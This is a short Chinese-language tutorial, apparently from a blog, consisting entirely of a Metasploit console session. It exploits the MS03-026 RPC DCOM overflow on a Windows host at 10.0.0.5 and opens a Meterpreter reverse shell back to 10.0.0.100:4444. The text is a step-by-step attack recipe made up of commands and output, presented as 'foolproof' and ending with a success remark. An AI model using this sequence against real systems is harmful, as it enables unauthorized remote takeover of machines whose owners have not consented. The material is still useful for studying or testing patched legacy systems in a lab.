傻瓜式利用ms03_026_dcom:
Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- auxiliary/scanner/telnet/telnet_ruggedcom normal RuggedCom Telnet Password Generator exploit/windows/dcerpc/ms03_026_dcom 2003-07-16 great MS03-026 Microsoft RPC DCOM Interface Overflow exploit/windows/smb/ms04_031_netdde 2004-10-12 good MS04-031 Microsoft NetDDE Service Overflow exploit/windows/smb/psexec_psh 1999-01-01 manual Microsoft Windows Authenticated Powershell Command Execution msf > use exploit/windows/dcerpc/ms03_026_dcom //设置漏洞代码 msf exploit(ms03_026_dcom) > show options Module options (exploit/windows/dcerpc/ms03_026_dcom): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 135 yes The target port Exploit target: Id Name -- ---- 0 Windows NT SP3-6a/2000/XP/2003 Universal msf exploit(ms03_026_dcom) > set RHOST 10.0.0.5 RHOST => 10.0.0.5 msf exploit(ms03_026_dcom) > exploit [*] Started reverse handler on 10.0.0.100:4444 [*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal... [*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.0.0.5[135] ... [*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.0.0.5[135] ... [*] Sending exploit ... [*] Sending stage (770048 bytes) to 10.0.0.5 [*] Meterpreter session 1 opened (10.0.0.100:4444 -> 10.0.0.5:1231) at 2015-04-25 17:08:20 +0800 meterpreter > //成功了!